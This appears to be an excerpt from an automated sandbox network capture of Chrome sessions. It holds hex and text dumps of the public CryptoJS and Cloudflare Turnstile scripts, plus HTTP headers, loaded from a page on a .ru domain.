                                                          2025-01-16 04:17:31 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                          Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                          2025-01-16 04:17:31 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                          Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                          2025-01-16 04:17:31 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                          Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                          2025-01-16 04:17:31 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                          Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                          2025-01-16 04:17:31 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                          Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                          2025-01-16 04:17:31 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                          Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449746104.18.94.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:32 UTC646OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://guf1.xemirax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:32 UTC471INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:32 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 47521
                                                          Connection: close
                                                          accept-ranges: bytes
                                                          last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                          access-control-allow-origin: *
                                                          cross-origin-resource-policy: cross-origin
                                                          Server: cloudflare
                                                          CF-RAY: 902b4be06a1f18c8-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:32 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                          Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                          Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                          Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                          Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                          Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                          Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                          2025-01-16 04:17:32 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                          Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449747104.17.25.144432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:32 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                          Host: cdnjs.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:32 UTC966INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:32 GMT
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: public, max-age=30672000
                                                          ETag: W/"61182885-40eb"
                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                          cf-cdnjs-via: cfworker/kv
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Timing-Allow-Origin: *
                                                          X-Content-Type-Options: nosniff
                                                          CF-Cache-Status: HIT
                                                          Age: 658863
                                                          Expires: Tue, 06 Jan 2026 04:17:32 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jA1ygGkNW5%2BazDxNwDcChcZNo1s3BbzJkW9tu%2BZM%2B%2B7CnegA74Fm58Cj%2B8Rp5Go%2FTWfubpjmnGID0QcCE0zpe7aJ8XCsyRvs5qlxgjE9u7PsR784%2BSu5dK8pQ7PVyugvNk7MnkCv"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                          Strict-Transport-Security: max-age=15780000
                                                          Server: cloudflare
                                                          CF-RAY: 902b4be17adff5f7-EWR
                                                          alt-svc: h3=":443"; ma=86400
